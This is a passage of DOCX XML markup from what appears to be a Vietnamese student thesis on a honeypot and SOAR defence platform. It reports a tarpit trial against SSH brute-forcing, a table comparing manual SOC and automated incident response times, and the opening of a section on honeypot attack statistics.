        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để kiểm chứng năng lực làm tiêu hao tài nguyên đối phương, hệ thống chuyển sang chế độ phản ứng 'Tarpit Redirect' đối với IP tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thay vì ngắt kết nối bằng DROP, toàn bộ gói tin TCP tới cổng SSH từ IP của hacker được chuyển hướng sang dịch vụ Tarpit tại cổng 22222. Tại đây, máy chủ chỉ gửi từng byte banner cách nhau 10 giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kết quả đo lường: Kẻ tấn công bị giam giữ liên tục 20 luồng socket trong trạng thái ESTABLISHED suốt hơn 45 phút. Tốc độ thử mật khẩu của đối phương bị sụt giảm từ 250 lần/phút xuống còn 0 lần/phút mà tiến trình quét của hacker không hề báo lỗi, làm cạn kiệt hoàn toàn bảng socket của botnet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2926080"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="tarpit_effectiveness.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2926080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 5.1: Đo lường Hiệu quả Làm chậm &amp; Triệt tiêu Tấn công của Cơ chế Tarpit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.6 Đánh giá Định lượng Hiệu năng: Thủ công (Manual SOC) vs Tự động hóa SOAR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để chứng minh tính vượt trội về mặt kỹ thuật, một bài kiểm tra so sánh nghiêm ngặt đã được tiến hành giữa Quy trình phản ứng truyền thống của Chuyên viên SOC L1 và Nền tảng SOAR tự động hóa của đồ án:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 5.1: Bảng so sánh định lượng thời gian phản ứng sự cố (MTTR)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2351"/>
        <w:gridCol w:w="2351"/>
        <w:gridCol w:w="2351"/>
        <w:gridCol w:w="2351"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Giai đoạn Xử lý Sự cố</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Quy trình Thủ công (SOC L1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Hệ sinh thái SOAR Đồ án</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mức độ Tối ưu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phát hiện &amp; Đọc log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Chờ chuyên viên mở bảng điều khiển (3 - 5 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Stream log thời gian thực (&lt; 200 ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nhanh hơn 1.500 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tương quan &amp; Ánh xạ MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tra cứu bảng kỹ thuật thủ công (2 - 3 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Correlation Engine tự động (&lt; 50 ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nhanh hơn 3.600 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Trinh sát ngược (OSINT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mở trình duyệt gõ AbuseIPDB, Shodan (5 - 8 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Reverse Intel API tự động (1.8 giây)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nhanh hơn 200 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phân tích Mã độc (VT Scan)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tải file lên web VirusTotal thủ công (4 - 6 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Payload Analyzer tự động băm &amp; quét (2.5 giây)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nhanh hơn 120 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Chặn Firewall &amp; Giam Tarpit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mở terminal gõ lệnh iptables (2 - 4 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SOAR Enforcer thực thi tự động (400 ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nhanh hơn 450 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tổng thời gian MTTR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>15 - 26 phút (900 - 1.560 giây)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1.8 - 2.5 giây</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Giảm 99.8% độ trễ phản ứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3048000"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="soar_response_comparison.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 5.2: So sánh Thời gian Phản ứng Sự cố: Quy trình Thủ công vs Tự động hóa SOAR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.7 Thống kê và Phân tích Tình báo các Cuộc Tấn công Thực tế từ Internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sau khi triển khai thử nghiệm Honeypot trên một máy chủ đám mây công khai (Public Cloud IP) trong thời gian 7 ngày liên tục, hệ thống đã thu thập được 2.731 sự kiện tấn công thực tế từ khắp nơi trên thế giới:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Số lượng địa chỉ IP độc hại duy nhất ghi nhận: 418 địa chỉ IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
